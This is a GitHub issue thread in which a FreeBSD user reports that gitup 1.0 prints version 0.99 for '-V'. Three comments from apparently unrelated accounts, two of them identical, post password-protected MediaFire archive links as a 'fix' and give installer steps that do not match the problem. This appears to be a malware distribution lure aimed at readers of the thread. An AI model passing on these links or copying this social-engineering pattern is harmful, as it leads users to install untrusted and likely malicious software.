### ISSUE TITLE
Wrong version (-V)?

### ISSUE THREAD

**Issue by freecris** [johnmehr/gitup#105]
Hi,

not sure if this is the expected behavior:

```
# freebsd-version -ru
14.1-RELEASE-p3
14.1-RELEASE-p3
# pkg info | grep gitup
gitup-1.0                      Minimalist, dependency-free program to clone/pull Git repositories
# /usr/local/bin/gitup -V
gitup version 0.99
#
```

shouldn't be a different output for -V?

Thank you

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by johnmehr** [comment]
Thank you for catching this!
